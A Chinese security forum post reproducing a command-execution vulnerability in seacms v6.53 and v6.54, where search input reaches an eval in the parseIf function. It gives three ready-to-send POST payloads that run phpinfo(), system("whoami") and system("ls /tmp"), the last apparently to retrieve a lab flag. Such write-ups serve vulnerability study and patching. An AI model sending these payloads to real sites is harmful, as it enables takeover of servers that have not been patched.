安全矩阵

 找回密码
 立即注册
搜索
查看: 2350|回复: 0

seacms-v6.53 命令执行漏洞

[复制链接]

114

主题

158

帖子

640

积分

高级会员

Rank: 4

积分
640
发表于 2020-8-12 09:44:03 | 显示全部楼层 |阅读模式
seacms-v6.53 命令执行漏洞

原文链接:https://zhishihezi.net/box/c7ecf406d93ed094559f1cd654950609

1. 漏洞描述
echoSearchPage 函数中的 content 变量传给了 parself 函数,跟踪代码,找到 ./include/main.class.php,可以看到 parseIf 函数会将 content 内容 eval 执行,造成命令执行。

二、影响版本
seacms v6.53、seacmsv6.54 版本

三、复现过程
1.抓取搜索框数据包将原本内容换为网上 Poc 的内容
  1. searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=ph&9[]=pinfo();
复制代码


2.将数据包放过 查看返回结果 可见写入 9[] 的代码被执行

3.进一步利用,可以执行系统命令
  1. searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("whoami");
复制代码



4.获取 Flag
  1. searchtype=5&searchword={if{searchpage:year}&year=:e{searchpage:area}}&area=v{searchpage:letter}&letter=al{searchpage:lang}&yuyan=(join{searchpage:jq}&jq=($_P{searchpage:ver}&&ver=OST[9]))&9[]=sy&9[]=stem("ls /tmp");
复制代码






回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

小黑屋|安全矩阵

GMT+8, 2024-4-20 11:35 , Processed in 0.012364 second(s), 18 queries .

Powered by Discuz! X4.0

Copyright © 2001-2020, Tencent Cloud.

快速回复 返回顶部 返回列表